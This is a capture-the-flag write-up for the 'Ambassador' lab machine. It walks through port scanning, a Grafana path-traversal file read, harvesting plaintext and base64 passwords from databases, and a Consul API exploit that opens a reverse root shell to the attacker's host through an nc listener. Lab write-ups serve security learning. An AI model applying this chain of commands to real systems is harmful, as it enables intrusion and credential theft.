Ambassador
nmap first initial scan with SYN shows 4 opens ports
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
3306/tcp open mysqlfull tcp nmap scan to see any other open ports shows 2 more ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
3306/tcp open mysql
39455/tcp filtered unknown
49407/tcp filtered unknownnmap scan using default script for found ports `sudo nmap -sS -sC -sV -p 22,80,3000,3306,349455,49407 ` shows
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
| 256 80:a4:c5:2e:9a:b1:ec:da:27:64:39:a4:08:97:3b:ef (ECDSA)
|_ 256 f5:90:ba:7d:ed:55:cb:70:07:f2:bb:c8:91:93:1b:f6 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|http-title: Ambassador Development Server
3000/tcp open ppp?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fn22t%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 07 Jan 2023 12:57:51 GMT
| Content-Length: 29
| href=”/login”>Found.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 07 Jan 2023 12:57:10 GMT
| Content-Length: 29
| href=”/login”>Found.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Sat, 07 Jan 2023 12:57:17 GMT
| Content-Length: 0
3306/tcp open mysql MySQL 8.0.30-0ubuntu0.20.04.2
|_mysql-info: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kerneladded ambassador.htb to /etc/hosts
host:80 running Huga 0.94.2
host:3000 running grafana v8.2.0 (grafana v8.2.0 vulnerable to path traversal)
extracted defaults.ini & grafana.db config through path traversal
we can now use sqlite3 to read grafana.db file `sqlite3 grafana.db`
`.tables` to see tables in db
sqlite> select * from user;
1|0|admin|admin@localhost||dad0e56900c3be93ce114804726f78c91e82a0f0f0f6b248da419a0cac6157e02806498f1f784146715caee5bad1506ab069|0X27trve2u|f960YdtaMF||1|1|0||2022-03-13 20:26:45|2022-09-01 22:39:38|0|2022-09-14 16:44:19|0sqlite> select * from data_source;
2|1|1|mysql|mysql.yaml|proxy||dontStandSoCloseToMe63221!|grafana|grafana|0|||0|{}|2022-09-01 22:43:03|2023-01-07 12:46:49|0|{}|1|uKewFgM4z
we see a plain password for mysql for the user grafana
mysql -h 10.129.57.58 -u grafana –password=dontStandSoCloseToMe63221!
MySQL [sys]> show databases;
+--------------------+
| Database |
+--------------------+
| grafana |
| information_schema |
| mysql |
| performance_schema |
| sys |
| whackywidget |
+--------------------+
MySQL [sys]> use whackywidget;
MySQL [whackywidget]> show tables;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users |
+------------------------+
MySQL [whackywidget]> select * from users;
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
pass looks base64 encoded so we’ll use `base64 -d` to decode it
└─$ base64 -d password.txt
anEnglishManInNewYork027468we can now ssh to developer user and get the user.txt flag
cat user.txt
9aee29464b51537ee2a8ce88e1c6d46e╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/snap/bin/lxc
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ‘django-insecure–lqw3fdyxw(28h#0(w8_te*wm*6ppl@g!ttcpo^m-ig!qtqy!l’
we see .gitconfig in home folder
developer@ambassador:~$ cat .gitconfig
[user]
name = Developer
email = developer@ambassador.local
[safe]
directory = /opt/my-appwe find that we have consul installed in system Consul v1.13.2
we checkout the git logs using
git log -p
and find the token bb03b43b-1d81-d62b-24b5-39540ee469b5
we use a python exploit from github https://github.com/GatoGamer1155/Hashicorp-Consul-RCE-via-API to get a root shell by downloading it in our machine and serving it using python http.server and download it in the victims machine
python3 exploit.py –rhost 127.0.0.1 –rport 8500 –lhost 10.10.16.10 –lport 1234
–token bb03b43b-1d81-d62b-24b5-39540ee469band listen with nc in our machine `nc -lvnp 1234`
after running the script in the victims machine we get the root shell and now we can get the flag
9f67114e16e88cef9ac8d8add6d0c389